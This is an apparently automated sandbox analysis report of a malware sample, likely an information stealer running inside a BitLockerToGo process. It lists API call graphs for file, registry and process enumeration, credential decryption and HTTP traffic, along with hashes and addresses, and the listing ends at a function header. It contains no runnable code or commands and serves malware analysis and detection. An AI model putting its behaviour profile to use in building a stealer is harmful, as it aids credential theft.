                                                                                                                                                                                                                                      execution_graph 10840 4ad98b GetUserNameW 10841 4a3348 Process32Next 10842 489d4a 10843 489d70 connect 10842->10843 10845 4a1b88 10846 4a1b98 RtlAllocateHeap 10845->10846 10853 4a3646 Process32Next 10854 4a365d 10853->10854 10855 49ff59 10856 49ff84 RegQueryValueExA 10855->10856 10857 4abf5b 10858 4abf7b FindNextFileA 10857->10858 10860 489c5b socket 10864 4abd1e 10865 4abd39 FindFirstFileA 10864->10865 10867 48a09e recv 10868 49edd1 GetVolumeInformationA 10869 49ee1e 10868->10869 10876 484468 10877 484488 InternetCrackUrlA 10876->10877 10879 48450b 10877->10879 10880 489ca9 10881 489ce9 getaddrinfo 10880->10881 10884 489e2c 10885 489e47 send 10884->10885 10890 49efef GetCurrentHwProfileA 10895 4a81a3 10896 4a81be CreateThread 10895->10896 10898 4a8206 10896->10898 10899 4ab95a 10896->10899 10900 4ab97c 10899->10900 10901 4a0420 10902 4a0441 10901->10902 10903 4a0464 RegOpenKeyExA 10902->10903 10904 49fe65 RegEnumKeyExA 10905 481124 10906 481145 RegOpenKeyExA 10905->10906 10908 4a32fa CreateToolhelp32Snapshot Process32First 10909 4adaba 10921 4adac7 10909->10921 10922 4acdec 10909->10922 10927 4ac6c8 10909->10927 10937 4acbea 10909->10937 10943 4ace56 10909->10943 10947 4ac391 GetFileAttributesA 10909->10947 10949 4acf30 Sleep 10909->10949 10951 4ace9c 10909->10951 10955 4acaf8 10909->10955 10961 4ac8b8 10909->10961 10985 4acfda 10909->10985 10991 4acee2 10909->10991 10923 4ace09 10922->10923 10995 4a95ff 10923->10995 10998 4a967c 10923->10998 10928 4ac6ee CreateDirectoryA 10927->10928 11009 4ab6b8 10928->11009 11013 4ab7fd 10928->11013 10930 4ac7b6 10934 485170 HttpSendRequestA 10930->10934 10935 485053 InternetCloseHandle 10930->10935 10936 484f86 InternetReadFile 10930->10936 10931 4ac86d 10934->10931 10935->10931 10936->10931 10938 4acc21 10937->10938 11049 4870a7 InternetReadFile 10938->11049 10939 4acd5c 10941 4a90bf FindFirstFileA FindNextFileA FindNextFileA GetLogicalDriveStringsA GetDriveTypeA 10939->10941 10940 4acdc0 10941->10940 10944 4ace73 10943->10944 11050 4a1992 10944->11050 10948 4ac3b3 10947->10948 10950 4acf56 10949->10950 10952 4aceb3 10951->10952 11052 4aab19 10952->11052 10956 4acb2f 10955->10956 11061 4870a7 InternetReadFile 10956->11061 10957 4acb62 10960 482740 FindFirstFileA FindFirstFileA 10957->10960 10958 4acbc6 10960->10958 10962 4ac8f1 10961->10962 11062 487189 InternetCloseHandle 10962->11062 11064 4870a7 InternetReadFile 10962->11064 10963 4ac924 10969 4870a7 InternetReadFile 10963->10969 10964 4ac9aa 10968 4870a7 InternetReadFile 10964->10968 10965 4aca30 10970 4a0268 Process32Next 10965->10970 10971 49f53d GetTimeZoneInformation 10965->10971 10972 4a01ff CreateToolhelp32Snapshot Process32First 10965->10972 10973 4a6f8c GlobalMemoryStatusEx 10965->10973 10974 49f9a3 GetSystemInfo 10965->10974 10975 4a6f96 GlobalMemoryStatusEx 10965->10975 10966 4aca75 10976 4958e9 FindFirstFileA FindNextFileA GetFileAttributesA 10966->10976 10977 495739 8 API calls 10966->10977 10978 49551c GetFileAttributesA 10966->10978 10979 495a1e GetFileAttributesA 10966->10979 10980 495c33 8 API calls 10966->10980 10981 4953f2 24 API calls 10966->10981 10982 495814 CreateFileA RegOpenKeyExA 10966->10982 10967 4acad1 10968->10965 10969->10964 10970->10966 10971->10966 10972->10966 10973->10966 10974->10966 10975->10966 10976->10967 10977->10967 10978->10967 10979->10967 10980->10967 10981->10967 10982->10967 10986 4ad011 10985->10986 11065 4870a7 InternetReadFile 10986->11065 10987 4ad044 10989 4870a7 InternetReadFile 10987->10989 10988 4ad11d 10989->10988 10992 4acef9 10991->10992 11066 4aae60 10992->11066 10996 4a9623 10995->10996 10997 4a9646 RegOpenKeyExA 10996->10997 10999 4a969a 10998->10999 11006 4a91ea 10999->11006 11000 4a976d 11003 4a91ea FindFirstFileA 11000->11003 11001 4a97c1 11004 4a91ea FindFirstFileA 11001->11004 11002 4a9815 11003->11001 11004->11002 11007 4a9224 FindFirstFileA 11006->11007 11010 4ab6d8 11009->11010 11017 4ab2bd 11010->11017 11014 4ab810 11013->11014 11041 4ab180 11014->11041 11018 4ab2e5 11017->11018 11026 487913 InternetReadFile 11018->11026 11027 487751 InternetConnectA 11018->11027 11028 4877bf 11018->11028 11031 48764d 11018->11031 11035 48785a 11018->11035 11038 4877b6 11018->11038 11029 4877c6 HttpOpenRequestA 11028->11029 11032 48767e InternetOpenA 11031->11032 11034 4876f4 11032->11034 11036 487876 HttpSendRequestA 11035->11036 11037 4878a8 11036->11037 11039 4877c6 HttpOpenRequestA 11038->11039 11042 4ab1ac 11041->11042 11046 487a42 InternetCloseHandle 11042->11046 11048 487913 InternetReadFile 11042->11048 11047 487a0b 11046->11047 11051 4a19a9 GetFileAttributesA 11050->11051 11053 4aab42 11052->11053 11058 4aa4e5 11053->11058 11054 4aac25 11056 4aa4e5 FindFirstFileA 11054->11056 11055 4aac92 11056->11055 11059 4aa51c FindFirstFileA 11058->11059 11063 4871aa 11062->11063 11067 4aae83 11066->11067 11073 4aa4e5 FindFirstFileA 11067->11073 11068 4aaf78 11071 4aa4e5 FindFirstFileA 11068->11071 11069 4ab065 11072 4aa4e5 FindFirstFileA 11069->11072 11070 4ab167 11071->11069 11072->11070 11073->11068 11077 4ad6fe 11078 4ad719 ShellExecuteEx 11077->11078 11080 4ad869 11078->11080 11081 4ad877 ExitProcess 11080->11081 11082 4ad89b 11081->11082 11083 4ab9be 11084 4ab9ca 11083->11084 11090 486333 InternetReadFile 11084->11090 11091 48658c 11084->11091 11094 485b4b 11084->11094 11098 486456 InternetCloseHandle 11084->11098 11092 4865a8 HttpSendRequestA 11091->11092 11095 485b70 RtlAllocateHeap 11094->11095 11097 48618e 11095->11097 11099 486472 11098->11099 11103 4a813d Sleep 11104 4a8160 11103->11104 11105 49f1f3 11106 49f216 RegQueryValueExA 11105->11106 11107 49f23d 11106->11107 11108 4a36f0 TerminateProcess 11109 4a370e 11108->11109 11109->11109 11110 49f6b3 GetLocaleInfoA 11111 4895f3 11112 4895b6 11111->11112 11112->11111 11113 489597 InternetReadFile 11112->11113 11113->11112 11114 4a2b74 K32GetModuleFileNameExA 11115 4a2b90 11114->11115

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 0048CCEA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 747 48ccea-48ce20 FindFirstFileA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 0048CDF7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID: $|X$j(M$lTL$lTL
                                                                                                                                                                                                                                      • API String ID: 1974802433-3839430313
                                                                                                                                                                                                                                      • Opcode ID: 4aa6b746782345d58c82c63fb15de7ee152b6c9eea16fb16def92ad20e94c974
                                                                                                                                                                                                                                      • Instruction ID: fd0c8577872231d620be801953701a3da5848feedc2215e78e7a5789b6870394
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aa6b746782345d58c82c63fb15de7ee152b6c9eea16fb16def92ad20e94c974
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37318CB27011189FCB54DBACDCC1FAD33B5AFC9308F054878E019D3351DA34AA598B59
                                                                                                                                                                                                                                      Function 004818DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 004819DA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID: 0%M$0%M
                                                                                                                                                                                                                                      • API String ID: 1974802433-698892898
                                                                                                                                                                                                                                      • Opcode ID: 7b65614ba1abd74200ab069020bb6e76febae36878e7313d8c8e2109e0471e45
                                                                                                                                                                                                                                      • Instruction ID: f7ef74fd4390c3e77cd637f411c158e4af5850a3a171e9aaeafc3e0986d30521
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b65614ba1abd74200ab069020bb6e76febae36878e7313d8c8e2109e0471e45
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19310EB6A001249FC744DB98ECA1EAD73B9EFC8704B08446CB51AD3355EA74BF45CB58
                                                                                                                                                                                                                                      Function 0048177C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 004819DA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID: 0%M$3%M
                                                                                                                                                                                                                                      • API String ID: 1974802433-737082427
                                                                                                                                                                                                                                      • Opcode ID: 28291ed3258b070ed29547f4135d65c4f252993b81eb465d74dd53977799d787
                                                                                                                                                                                                                                      • Instruction ID: 2ddd846b4f0445c3a32784e4539c34b3c3c8f322f3eeff704f32b5d53988b5df
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28291ed3258b070ed29547f4135d65c4f252993b81eb465d74dd53977799d787
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC313CB6A001259BC755DB98DCA1EE973B4BF84304B08447CA51AE3351FA34BF4ACB58
                                                                                                                                                                                                                                      Function 00492AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 00492B77
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID: j(M$j(M
                                                                                                                                                                                                                                      • API String ID: 1974802433-3323343470
                                                                                                                                                                                                                                      • Opcode ID: 3cb4fdcbabe47eeb54135c5d0026f29138d6cf75c8ac6218a7f32f117ae72e14
                                                                                                                                                                                                                                      • Instruction ID: ba671803de1c6f63b62549c44269e4d3a4b566c38f8c70a5119f4b5fb9e2535c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cb4fdcbabe47eeb54135c5d0026f29138d6cf75c8ac6218a7f32f117ae72e14
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A219F76B002089FCB58DB6CEC91EDD73B6EFC4309B184528E816D3364DA34AE15CB99
                                                                                                                                                                                                                                      Function 0048E749 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 0048E7FD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID: j(M
                                                                                                                                                                                                                                      • API String ID: 1974802433-4012967011
                                                                                                                                                                                                                                      • Opcode ID: 24e617846438849b7be14dfa0b2bfd0df88224c3d705e937f76781ea82959de6
                                                                                                                                                                                                                                      • Instruction ID: 00959e003ccb3a9a77b99e8f2d853576a9f9c8d5c613929af84111eed999dc03
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24e617846438849b7be14dfa0b2bfd0df88224c3d705e937f76781ea82959de6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD21CD726002489FCB94DF9CCCC5FAD77A5AF88318F04453CE42AD7351DA34AA59CB5A
                                                                                                                                                                                                                                      Function 0049F9A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                                                                                                      • String ID: ".M
                                                                                                                                                                                                                                      • API String ID: 31276548-3353509789
                                                                                                                                                                                                                                      • Opcode ID: 207d4ebda88de21e3c5cbee6245992d87326ba2b44876e8f0460e2a305bbefae
                                                                                                                                                                                                                                      • Instruction ID: db408dbfa1f8972bf6c6ead60270b412adbe297caff24c91267249ce94352be1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 207d4ebda88de21e3c5cbee6245992d87326ba2b44876e8f0460e2a305bbefae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7F0A0B3A000186BD2109719FC91D9777ADEFC921CB0A0139FA5993310E2256E1A86BE
                                                                                                                                                                                                                                      Function 0049F53D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32 ref: 0049F573
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InformationTimeZone
                                                                                                                                                                                                                                      • String ID: 6l
                                                                                                                                                                                                                                      • API String ID: 565725191-3579878408
                                                                                                                                                                                                                                      • Opcode ID: ffb66484c48cb0ca39c1ad6d4e55427e6c18576efeb2d39d1ab0b9026a8bc6c6
                                                                                                                                                                                                                                      • Instruction ID: e694b2d4e95fb9c047e81c98f63feebad2a6650088f13ab77449f36fa2fc60de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffb66484c48cb0ca39c1ad6d4e55427e6c18576efeb2d39d1ab0b9026a8bc6c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09E092B6700200ABD36CDF3CDDD5F5A36A99B85364B05463CB125CB3D9D5719C148658
                                                                                                                                                                                                                                      Function 004A01FF Relevance: 3.0, APIs: 2, Instructions: 33processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004A023A
                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 004A024A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2353314856-0
                                                                                                                                                                                                                                      • Opcode ID: 48228e33199a9206a2a62a267872cc561c86207e9f495f1328701ab69d407033
                                                                                                                                                                                                                                      • Instruction ID: bdb9bf6098f901f309479d4eedda34ef7bd2ad0fe7567fe2c9aec3723f721da6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48228e33199a9206a2a62a267872cc561c86207e9f495f1328701ab69d407033
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F09A766002515BDB688F2ADC85F5B7AA9ABC5300F084819B445CB390CA74A814CBA9
                                                                                                                                                                                                                                      Function 0048B846 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDesktop
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3054513912-0
                                                                                                                                                                                                                                      • Opcode ID: ecb7043c00834eaa03ab900e7bb123ca51ee14c0fc1f1d95f29a5c30ac75dc7f
                                                                                                                                                                                                                                      • Instruction ID: df0d23606d74d7104fcc8b644be099c283515b4ec5ca9530d4b6621d751a5130
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecb7043c00834eaa03ab900e7bb123ca51ee14c0fc1f1d95f29a5c30ac75dc7f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A431F872A102048BC744DF68DDD0FA533F4FB98708F088169E809D7312DA74EAA5CB55
                                                                                                                                                                                                                                      Function 0049008C Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 00490141
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      • Opcode ID: 8a1201bc067d4597cc7da3045a40345cbc069ab796ef71e58651f1bb753931c4
                                                                                                                                                                                                                                      • Instruction ID: a2b71f5fbe58d7237c9db5d03dea6cc822233805a27149173a1d94e9f5cccbd8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a1201bc067d4597cc7da3045a40345cbc069ab796ef71e58651f1bb753931c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B219F367001189BC754CB9CDCD9FA977B5AF89308F044179E619E3350EA34BE15CB69
                                                                                                                                                                                                                                      Function 004A8248 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 004A82AF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      • Opcode ID: e4dfd73a8088e7a8da7e77a7ecbe14baf913e2cda003b46df34edb76db525b37
                                                                                                                                                                                                                                      • Instruction ID: 68d9c857c41d2a0fe26f4903d1aaaa6b7e0ed988218d0bbf5c1f2119663d7453
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4dfd73a8088e7a8da7e77a7ecbe14baf913e2cda003b46df34edb76db525b37
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA11E7B2A002546BD710DB99DC85D9B3BADDB85310F040179F919D7341E6789F58CBA4
                                                                                                                                                                                                                                      Function 004A91EA Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 004A9256
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      • Opcode ID: 946c9b6047b86052fddf2c4cdfd49eedbfc6e8e750d68abf6d314a8c36ec8718
                                                                                                                                                                                                                                      • Instruction ID: 1b7248fcbf86cbaeafaec9afc224586b0ac6c820f405df66de6a7fb1adaa6479
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 946c9b6047b86052fddf2c4cdfd49eedbfc6e8e750d68abf6d314a8c36ec8718
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE01F172220204AFD748EB68DC91EA633A9EBC4310B004928A616CB351E778ED4987A9
                                                                                                                                                                                                                                      Function 004AA4E5 Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 004AA548
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      • Opcode ID: aca3aa1b4c231073760bb2045c0af6a4b3526476f205648e045ed3c80d46a3cc
                                                                                                                                                                                                                                      • Instruction ID: 0e48acfb0c0eebcad9f4630e26bfa83cc973ba8f7b623e9d6fd27d83347d5f5d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aca3aa1b4c231073760bb2045c0af6a4b3526476f205648e045ed3c80d46a3cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA014E769011149FD704CB55ECC1DAA3B79EF85320F048039E41AE3390E634EE14C7A4
                                                                                                                                                                                                                                      Function 004ABD1E Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 004ABD60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                                      • Opcode ID: 382e1cdd87a0fe20a3c673bb8a4cb8aa2b7ef85146f7acc3ec365e0e752a73d2
                                                                                                                                                                                                                                      • Instruction ID: 8324317a163b17fcba010082ed08ce3c25d02ad0d60223c5fb4caf297a852d02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 382e1cdd87a0fe20a3c673bb8a4cb8aa2b7ef85146f7acc3ec365e0e752a73d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24F05EB2720109AFD744DF6CEC91E6A33DDAB84214F04053AB816D3391EA79AA088B55
                                                                                                                                                                                                                                      Function 0048C009 Relevance: 1.5, APIs: 1, Instructions: 30encryptionCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32 ref: 0048C04B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 834300711-0
                                                                                                                                                                                                                                      • Opcode ID: 73c0518024c66a7d0dd5c9f7639f998a259beeb753ec6005beccd559c174bec2
                                                                                                                                                                                                                                      • Instruction ID: 0b59e2b0cc5adccbdfc66cf8dd6683630a900535aceeb738e601d647966828e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73c0518024c66a7d0dd5c9f7639f998a259beeb753ec6005beccd559c174bec2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40F06D719083068FC304DF28C984A16BBF1EFC8758F05CA5DE88897301E630D994CB96
                                                                                                                                                                                                                                      Function 004AD98B Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 004AD9B4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                                                                      • Opcode ID: 1bdba99952ee4c1084203613218a067b957d4f0eb8520f9518cc28fe95a63080
                                                                                                                                                                                                                                      • Instruction ID: 0aa797257ed13b619dba4465344c031b56936db0e8327a46afa3142662b11b60
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bdba99952ee4c1084203613218a067b957d4f0eb8520f9518cc28fe95a63080
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0E092B72042009BC310DF28DD91EA677E9EB86300F05456CA984C7250E670FC04C759
                                                                                                                                                                                                                                      Function 004A8DDA Relevance: 1.5, APIs: 1, Instructions: 22COMMON
